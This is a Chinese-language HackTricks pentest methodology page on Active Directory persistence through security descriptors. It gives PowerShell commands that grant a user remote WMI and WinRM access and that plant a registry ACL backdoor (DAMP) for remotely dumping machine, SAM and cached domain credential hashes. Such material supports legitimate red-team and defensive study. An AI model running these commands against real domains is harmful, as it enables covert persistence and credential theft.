hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2023-08-03 19:12:22 +00:00

5.6 KiB
Raw Blame History

安全描述符

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

安全描述符

安全描述符定义语言SDDL定义了用于描述安全描述符的格式。SDDL使用ACE字符串来表示DACL和SACLace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

安全描述符用于存储对象对另一个对象权限。如果你可以对对象的安全描述符进行小的更改,你可以在不需要成为特权组成员的情况下获得对该对象的非常有趣的权限。

因此,这种持久化技术基于能够获得针对特定对象所需的每个权限,以便能够执行通常需要管理员权限的任务,但无需成为管理员。

访问WMI

你可以使用这个方法为用户提供远程执行WMI的访问权限:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

访问WinRM

为用户提供对winrm PS控制台的访问权限使用此链接

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

远程访问哈希值

访问注册表转储哈希值,使用DAMP创建Reg后门,这样你可以随时检索计算机的哈希值、SAM和计算机中的任何缓存的AD凭据。因此,将此权限授予普通用户对域控制器计算机非常有用:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

查看Silver Tickets以了解如何使用域控制器的计算机帐户的哈希值。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥